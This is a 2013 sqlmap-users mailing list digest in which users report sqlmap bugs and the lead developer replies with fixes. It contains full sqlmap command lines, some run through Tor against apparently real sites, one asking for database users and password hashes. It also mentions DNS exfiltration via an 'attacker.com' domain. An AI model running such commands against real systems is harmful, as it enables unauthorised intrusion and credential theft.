> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 5
> Date: Mon, 15 Apr 2013 12:19:13 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Hi Miroslav,
>
> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> > Hi Dirk.
> >
> > Now that crash should be "patched".
> >
> > Could you please retry it now and say if the latest revision suits your
> needs?
>
> cool, thx. Works!
>
> However (sorry):
>
> One needs to omit the cookie in the request header, otherwise it just uses
> the one
> supplied by the request.
>
> Then: It doesn't change the cookie. Maybe I was interpreting that not
> correctly
> but my point was using the load-cookies option to direct sqlmap to change
> cookies once in a while (whenever that's gonna be). This is to circumvent
> restrictions one can encounter otherwise....
>
> Cheers,
>
> Dirk
>
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >
> >     On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> >     > Nevertheless, with the latest commit that check should be
> "neutralized" now. Could you please retry it now?
> >
> >     thx, Miroslav.  I tried (b6fee63) but this time the cookie parser
> lib hiccups, using the same file:
> >
> >     /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning:
> cookielib bug!
> >     Traceback (most recent call last):
> >       File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
> >         assert domain_specified == initial_dot
> >     AssertionError
> >
> >       _warn_unhandled_exception()
> >     [11:13:26] [CRITICAL] there was a problem loading cookies file
> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> >     the 999.. looks strange to me.
> >
> >     >
> >     >
> >     > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...> <mailto:
> mir...@gm... <mailto:mir...@gm...>>> wrote:
> >     >
> >     >     Hi Dirk.
> >     >
> >     >     Well, I would say that you have an expired cookie. Do you see
> that value 0? That value should be a valid UNIX time representing time of
> cookie expiration. Also, I've just tested that cookie of yours and sqlmap
> says: "[WARNING] cookie '....' has expired"
> >     >
> >
> >     that's true but IMO 0 represents just a session cookie. Example:
> >
> >     prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com <http://bing.com>
> >     # HTTP cookie file.
> >     # Generated by Wget on 2013-04-15 11:23:13.
> >     # Edit at your own risk.
> >
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      MUID    333995A69E06630B2EB491169F016314
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _HOP
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _FS     NU=1
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      _FP     EM=1
> >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE
> 1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE
> 1429089794      MUIDB   333995A69E06630B2EB491169F016314
> >
> >     prompt%
> >
> >     Same parser problem btw if I edit the cookie file and put 1429089794
> unix time instead of 0 in there.
> >
> >     Ok: With the prev rev  ed5599f it reads this file ok (no session
> cookies but cookies w/ expiration date) and uses the last
> >     cookie only for the first 120 tries.
> >
> >     Cheers, Dirk
> >
> >
> >     >
> >     >     Kind regards,
> >     >     Miroslav Stampar
> >     >
> >     >
> >     >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >     >
> >     >
> >     >         Hi Miroslav,
> >     >
> >     >         thx for your prompt answer.
> >     >
> >     >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >     >         > Hi Dirk.
> >     >         >
> >     >         > Could you please get the latest revision and retry it
> again?
> >     >         ed5599f: almost the same: with cookie in the header sqlmap
> takes only this one.
> >     >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >     >         sqlmap doesn't use any cookie at all, i.e. now not the one
> from the server anymore.
> >     >         >
> >     >         > There was a situation where info messages have been
> wrongly written that original response contained Set-Cookie in situations
> like yours.
> >     >         >
> >     >         > In case that everything stays as it is, I'll need to ask
> you to provide more details. For example, cookie file would be great.
> >     >
> >     >         sure, here you go:
> >     >
> >     >         --snip
> >     >         # Netscape HTTP Cookie File
> >     >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t
> JSESSIONID  \t  <Cookie>
> >     >         [..]
> >     >         --snap
> >     >
> >     >         They are all session cookies. For easier reading here I
> put some blanks in the line
> >     >         above, in "cookie-file" there aren't any though. Cookies
> were generated with
> >     >         stompy and a shell script (looks he same as with
> >     >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >     >
> >     >         Again: sqlmap doesn't hiccup/complain while eating my
> cookies file ;-)
> >     >
> >     >         >
> >     >         > Also, please make sure that the cookie file contains
> proper cookie(s) - domain name should be the same as a domain of target,
> cookie needs to have a proper valid time, etc.
> >     >
> >     >         see above.
> >     >
> >     >         Cheers,
> >     >
> >     >         Dirk
> >     >
> >     >         >
> >     >         >
> >     >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >     >         >
> >     >         >     Hi Miroslav,
> >     >         >
> >     >         >     yes unfortunately.
> >     >         >
> >     >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >     >         >     seems to take the first cookie issued by the server
> with set-cookie (and
> >     >         >     put's it silently in).
> >     >         >
> >     >         >     Cheers,
> >     >         >
> >     >         >     Dirk
> >     >         >
> >     >         >
> >     >         >
> >     >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >     >         >     > Hi.
> >     >         >     >
> >     >         >     > And this is also happening if you are skipping
> "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original
> request?
> >     >         >     >
> >     >         >     > Kind regards,
> >     >         >     > Miroslav Stampar
> >     >         >     >
> >     >         >     >
> >     >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto:
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
> >     >         >     >
> >     >         >     >
> >     >         >     >     Hi folks,
> >     >         >     >
> >     >         >     >     .... that doesn't work for me. It always uses
> the cookie supplied
> >     >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >     >         >     >     from the 1st server reply is being used)
> >     >         >     >
> >     >         >     >     So what is wrong in here:
> >     >         >     >
> >     >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >     >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >     >         >     >       --threads=8 -v 6
> --load-cookies=$WD/cookie-file \
> >     >         >     >       --level=2 --risk=2 -r $REQUEST
> >     >         >     >
> >     >         >     >     The content of the file $REQUEST is:
> >     >         >     >
> >     >         >     >     POST <URL> HTTP/1.1
> >     >         >     >     Host: <HOST>
> >     >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows
> NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >     >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >     >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >     >         >     >     Accept-Language: en-US,en;q=0.5
> >     >         >     >     Accept-Encoding: gzip, deflate
> >     >         >     >     Referer: <Referer>
> >     >         >     >     Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >     >         >     >     Connection: keep-alive
> >     >         >     >     Content-Type: application/x-www-form-urlencoded
> >     >         >     >     Content-Length: 67
> >     >         >     >
> >     >         >     >     <abunchofpostparams>
> >     >         >     >
> >     >         >     >
> >     >         >     >     No hints that cookie-file is not in correct
> format (I've been through this,
> >     >         >     >     at least I think I so ;) ).
> >     >         >     >
> >     >         >     >     Any insight would be much appreciated.
> >     >         >     >
> >     >         >     >
> >     >         >     >     Cheers,
> >     >         >     >
> >     >         >     >     Dirk
> >     >         >     >
> >     >         >     >
> >     >         >     >
> ------------------------------------------------------------------------------
> >     >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >     >         >     >     analytics on semi-structured data. The
> platform includes APIs for building
> >     >         >     >     apps and a phenomenal toolset for data
> science. Developers can use
> >     >         >     >     our toolset for easy data analysis &
> visualization. Get a free account!
> >     >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >     >         >     >     _______________________________________________
> >     >         >     >     sqlmap-users mailing list
> >     >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>>
> >     >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >     >         >     >
> >     >         >     >
> >     >         >     >
> >     >         >     >
> >     >         >     > --
> >     >         >     > Miroslav Stampar
> >     >         >     > http://about.me/stamparm
> >     >         >
> >     >         >
> >     >         >
> >     >         >
> >     >         > --
> >     >         > Miroslav Stampar
> >     >         > http://about.me/stamparm
> >     >
> >     >
> >     >
> >     >
> >     >     --
> >     >     Miroslav Stampar
> >     >     http://about.me/stamparm
> >     >
> >     >
> >     >
> >     >
> >     > --
> >     > Miroslav Stampar
> >     > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> ------------------------------
>
> Message: 6
> Date: Mon, 15 Apr 2013 14:01:01 -0700
> From: <co...@5i...>
> Subject: [sqlmap-users] --host parameter
> To: sql...@li...
> Message-ID:
> <
> 201...@em...
> >
>
> Content-Type: text/plain; charset="utf-8"
>
> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
>
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:57:15
>
> [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>
>
> ....
>
>
> this doesn't work as expected:
>
>  ./sqlmap.py --host='i.csland.ro'
> --url='http://188.240.236.15/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to
> quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>
> Thanks.
>
>
>
>
> ------------------------------
>
> Message: 7
> Date: Tue, 16 Apr 2013 09:12:05 +1100
> From: ???????? ?????? <vo...@s2...>
> Subject: [sqlmap-users] Sqlmap and direct connect error
> To: sql...@li...
> Message-ID: <C59...@s2...>
> Content-Type: text/plain; charset=us-ascii
>
> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> --exclude-sysdbs
>
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -d
> **************************************************** -u
> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 87, in main
>     start()
>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> start
>     action()
>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>     setHandler()
>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> setHandler
>     conf.dbmsConnector.connect()
>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
> connect
>     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> passwd=self.password, db=self.db, port=self.port,
> connect_timeout=conf.timeout, use_unicode=True)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> line 93, in Connect
>     return Connection(*args, **kwargs)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 584, in __init__
>     self._connect()
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 739, in _connect
>     sock.connect((self.host, self.port))
>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> connect
>     raise GeneralProxyError((5, _generalerrors[5]))
> GeneralProxyError: (5, 'bad input')
>
>
>
>
> ------------------------------
>
> Message: 8
> Date: Tue, 16 Apr 2013 14:19:18 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --host parameter
> To: co...@5i...
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> Thank you for your report and find it fixed with the latest commit [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>
>
> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>
> > Hello,
> > the --host doesn't work as expected, or I am doing something wrong:
> >
> >
> > this works as expected:
> >
> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
> >
> >     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> > takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility to
> > obey all applicable local, state and federal laws. Developers assume no
> > liability and are not responsible for any misuse or damage caused by
> > this program
> >
> > [*] starting at 23:57:15
> >
> > [23:57:15] [INFO] testing connection to the target URL
> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> > [23:57:15] [INFO] testing if the target URL is stable. This can take a
> > couple of seconds
> > [23:57:16] [INFO] target URL is stable
> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> > [23:57:16] [INFO] GET parameter 'id' is dynamic
> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> > might be injectable (possible DBMS: 'MySQL')
> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
> >
> >
> > ....
> >
> >
> > this doesn't work as expected:
> >
> >  ./sqlmap.py --host='i.csland.ro'
> > --url='http://188.240.236.15/index.php?id=0'
> >
> >     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> > takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility to
> > obey all applicable local, state and federal laws. Developers assume no
> > liability and are not responsible for any misuse or damage caused by
> > this program
> >
> > [*] starting at 23:58:03
> >
> > [23:58:03] [INFO] testing connection to the target URL
> > [23:58:03] [CRITICAL] page not found (404)
> > it is not recommended to continue in this kind of cases. Do you want to
> > quit and make sure that everything is set up properly? [Y/n]
> > [23:58:05] [WARNING] HTTP error codes detected during run:
> >
> > ............
> >
> >
> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
> >
> > Thanks.
> >
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 9
> Date: Tue, 16 Apr 2013 14:33:33 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
> To: ???????? ?????? <vo...@s2...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
> Content-Type: text/plain; charset="koi8-r"
>
> Hi Vladimir.
>
> Find it "patched" with the latest commit [1]. Basically, those combinations
> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
> added new option validation checks for this kind of cases.
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>
>
> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>
> > Hi!
> >
> > This bug detected if add direct param.
> >
> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> > --exclude-sysdbs
> >
> >
> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
> retry
> > your run with the latest development version from the GitHub repository.
> If
> > the exception persists, please send by e-mail to '
> > sql...@li...' or open a new issue at '
> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> > text and any information required to reproduce the bug. The developers
> will
> > try to reproduce the bug, fix it accordingly and get back to you.
> > sqlmap version: 1.0-dev-de99717
> > Python version: 2.7.3
> > Operating system: posix
> > Command line: sqlmap.py -d
> > **************************************************** -u
> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> > --exclude-sysdbs
> > Technique: None
> > Back-end DBMS: MySQL (identified)
> > Traceback (most recent call last):
> >   File "sqlmap.py", line 87, in main
> >     start()
> >   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> > start
> >     action()
> >   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in
> action
> >     setHandler()
> >   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> > setHandler
> >     conf.dbmsConnector.connect()
> >   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38,
> in
> > connect
> >     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> > passwd=self.password, db=self.db, port=self.port,
> > connect_timeout=conf.timeout, use_unicode=True)
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> > line 93, in Connect
> >     return Connection(*args, **kwargs)
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> > line 584, in __init__
> >     self._connect()
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> > line 739, in _connect
> >     sock.connect((self.host, self.port))
> >   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> > connect
> >     raise GeneralProxyError((5, _generalerrors[5]))
> > GeneralProxyError: (5, 'bad input')
> >
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 10
> Date: Tue, 16 Apr 2013 23:26:39 +0200
> From: buawig <bu...@gm...>
> Subject: [sqlmap-users] feature request: offline mode for
> --dns-domain?
> To: SqlMap List <sql...@li...>
> Message-ID: <516...@gm...>
> Content-Type: text/plain; charset=UTF-8
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> Hi,
>
> in cases where sqlmap is run against targets on internal networks it
> would be great if one could tell sqlmap to simply proceed without
> expecting incoming DNS requests, because sqlmap can not be executed
> directly on the DNS server (which can't reach the target, but the
> target can reach the DNS server).
>
> For me it would be enough to simply run something like
> - -u ... --dns-domain=attacker.com --dns-port=0
> (--dns-port does not exist [yet])
>
> to let sqlmap know that it doesn't need to start a DNS listener.
>
> I would then collect and decode the DNS querries on the DNS server
> manually, but I could also envision runni...
 
[truncated message content]

Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1

[B. <sto...@qq...>]

Hi friend,




   Could you help me with this bug ?




[22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u *********************************************** --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft SQL Server --users --passwords
Technique: BOOLEAN
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap", line 87, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
    conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
  File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in getPasswordHashes
    if user in retrievedUsers:
TypeError: unhashable type: 'list'

[*] shutting down at 22:54:12

Thanks 



BOB
  


 




------------------ Original ------------------
From:  "sqlmap-users-request"<sql...@li...>;
Date:  May 29, 2013
To:  "sqlmap-users"<sql...@li...>; 
Subject:  sqlmap-users Digest, Vol 31, Issue 1



Send sqlmap-users mailing list submissions to
	sql...@li...

To subscribe or unsubscribe via the World Wide Web, visit
	https://lists.sourceforge.net/lists/listinfo/sqlmap-users
or, via email, send a message with subject or body 'help' to
	sql...@li...

You can reach the person managing the list at
	sql...@li...

When replying, please edit your Subject line so it is more specific
than "Re: Contents of sqlmap-users digest..."


Today's Topics:

   1. Re: Feature request (David Guimaraes)
   2. Re: --load-cookies (Dirk Wetter)
   3. Re: --load-cookies (Miroslav Stampar)
   4. Re: Patch for /task/<task_id>/delete in	clean_filesystem
      (Miroslav Stampar)
   5. Re: --load-cookies (Dirk Wetter)
   6. --host parameter (co...@5i...)
   7. Sqlmap and direct connect error (???????? ??????)
   8. Re: --host parameter (Miroslav Stampar)
   9. Re: Sqlmap and direct connect error (Miroslav Stampar)
  10. feature request: offline mode for --dns-domain? (buawig)
  11. feature request: --dns-domain for non-root users	(--dns-port)
      (buawig)
  12. Domain credentials (Brian Milliron)
  13. Re: Domain credentials (Brandon Perry)
  14. Re: feature request: offline mode for --dns-domain?
      (Miroslav Stampar)
  15. Re: Domain credentials (Miroslav Stampar)
  16. Re: feature request: fetch DNS queries from DNS server via
      HTTP (buawig)
  17. Re: feature request: fetch DNS queries from DNS server via
      HTTP (Miroslav Stampar)
  18. MySQL error based technique bug (Konrads Smelkovs)
  19. Re: MySQL error based technique bug (Miroslav Stampar)
  20. SQLmap crashing (Phillip Wylie)
  21. Re: SQLmap crashing (Miroslav Stampar)
  22. Custom injection payload in POST (Marcell Fodor)
  23. Re: SQLmap crashing (Miroslav Stampar)
  24. I got error on windows (warezhacking)
  25. Appending to a dump (Stephen Shkardoon)
  26. Re: Appending to a dump (Miroslav Stampar)
  27. Re: Appending to a dump (Stephen Shkardoon)
  28. Re: Appending to a dump (Miroslav Stampar)
  29. --ignore-404 ? (buawig)
  30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
      from 1 for 1) (buawig)
  31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
      from 1 for 1) (Miroslav Stampar)
  32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
      from 1 for 1) (Miroslav Stampar)
  33. Re: --ignore-404 ? (Miroslav Stampar)
  34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
  35. Re: BUG...!!!! o.O (Miroslav Stampar)
  36. gun...@gm... wants to follow you. Accept?
      (gun...@gm...)
  37. Direct access to mysql database (Marcell Fodor)
  38. Re: Direct access to mysql database (Miroslav Stampar)
  39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
      (Badoo)
  40. Not getting any sensitive data from database (Marcell Fodor)
  41. Re: Not getting any sensitive data from database
      (Miroslav Stampar)
  42. unhandled exception (kvasilopoulos)
  43. [SQLMAP] Unhandled exception for IPv6
      (e.n...@st...)
  44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
  45. Re: unhandled exception (Miroslav Stampar)
  46. Passing SOAPAction in --header (Brandon Perry)
  47. Re: Passing SOAPAction in --header (Miroslav Stampar)
